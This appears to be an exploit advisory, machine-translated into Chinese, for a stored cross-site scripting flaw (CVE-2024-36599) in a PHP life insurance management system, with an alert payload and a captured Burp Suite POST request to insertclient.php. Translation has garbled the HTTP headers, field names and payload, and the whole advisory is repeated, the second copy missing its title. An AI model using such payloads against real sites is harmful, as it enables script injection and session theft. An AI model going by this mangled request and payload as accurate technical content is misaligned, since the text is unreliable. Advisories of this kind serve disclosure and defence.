#利用标题:人寿保险管理存储的系统- 跨站点脚本(XSS)
#利用作者: Aslam Anwar Mahimkar
#日期: 18-05-2024
#类别: Web应用程序
#供应商homepage: https://projectworlds.in/
#软件link: https://projectworlds.in/life-insurance-management-system-system-in-php/
#版本: AEGON LIFE v1.0
#在: Linux上测试
#CVE: CVE-2024-36599
#Description:
-----------------------
AEGON LIFE v1.0中存储的跨站点脚本(XSS)漏洞允许攻击者通过精心设计的有效负载执行任意Web脚本,该有效负载注入了InsertClient.php的名称参数。
#payload:
-----------------------
ScriptTalet(document.domain)/脚本
#攻击矢量:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
要利用此漏洞,请使用scripttalert(document.domain)/脚本在用户访问client.php时,我们可以看到XSS。
#Burp Suite Request:
------------------------------------------------
post/lims/insertclient.php http/1.1
HOST: LOCALHOST
内容长度: 30423
cache-control: max-age=0
sec-ch-ua:'not-a.brand'; v='99','chromium'; v='124'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'linux'
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:多部分/form-data;边界=--- WebKitFormBoundaryMkFae0x95923Lzqh
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/124.0.6367.60 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/lims/addclient.php
Accept-incoding: Gzip,Deflate,br
Accept-Language: en-us,en; q=0.9
cookie: phpsessID=V6G7SHNK1MM5VQ6I63LKLCK78N
连接:关闭
------ webkitformboundarymkfae0x95923lzqh
content-disposition: form-data;名称='client_id'
1716051159
------ webkitformboundarymkfae0x95923lzqh
content-disposition: form-data;名称='client_password'
密码
------ webkitformboundarymkfae0x95923lzqh
content-disposition: form-data;名称='名称'
ScriptTalet(document.domain)/脚本
------ webkitformboundarymkfae0x95923lzqh
content-disposition: form-data; name='Filetoupload';文件名='runme.jpg_original'
content-type:应用程序/钟表流
ÿØÿà
#利用作者: Aslam Anwar Mahimkar
#日期: 18-05-2024
#类别: Web应用程序
#供应商homepage: https://projectworlds.in/
#软件link: https://projectworlds.in/life-insurance-management-system-system-in-php/
#版本: AEGON LIFE v1.0
#在: Linux上测试
#CVE: CVE-2024-36599
#Description:
-----------------------
AEGON LIFE v1.0中存储的跨站点脚本(XSS)漏洞允许攻击者通过精心设计的有效负载执行任意Web脚本,该有效负载注入了InsertClient.php的名称参数。
#payload:
-----------------------
ScriptTalet(document.domain)/脚本
#攻击矢量:
-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
要利用此漏洞,请使用scripttalert(document.domain)/脚本在用户访问client.php时,我们可以看到XSS。
#Burp Suite Request:
------------------------------------------------
post/lims/insertclient.php http/1.1
HOST: LOCALHOST
内容长度: 30423
cache-control: max-age=0
sec-ch-ua:'not-a.brand'; v='99','chromium'; v='124'
sec-ch-ua-mobile:0
sec-ch-ua-platform:'linux'
升级- 不肯定- requests: 1
Origin: http://localhost
content-type:多部分/form-data;边界=--- WebKitFormBoundaryMkFae0x95923Lzqh
用户- 代理: Mozilla/5.0(Windows NT 10.0; Win64; X64)AppleWebkit/537.36(Khtml,像Gecko一样)Chrome/124.0.6367.60 Safari/537.36
ACCEPT: TEXT/HTML,应用程序/XHTML+XML,Application/XML; Q=0.9,Image/avif,Image/WebP,Image/apng,/; q=0.8,application/application/application/nabiped-exchange; v=b3; q=0.7
sec-fetch-site:相同原产
sec-fetch mode:导航
sec-fetch-user:1
sec-fetch-Dest:文档
Referer: http://localhost/lims/addclient.php
Accept-incoding: Gzip,Deflate,br
Accept-Language: en-us,en; q=0.9
cookie: phpsessID=V6G7SHNK1MM5VQ6I63LKLCK78N
连接:关闭
------ webkitformboundarymkfae0x95923lzqh
content-disposition: form-data;名称='client_id'
1716051159
------ webkitformboundarymkfae0x95923lzqh
content-disposition: form-data;名称='client_password'
密码
------ webkitformboundarymkfae0x95923lzqh
content-disposition: form-data;名称='名称'
ScriptTalet(document.domain)/脚本
------ webkitformboundarymkfae0x95923lzqh
content-disposition: form-data; name='Filetoupload';文件名='runme.jpg_original'
content-type:应用程序/钟表流
ÿØÿà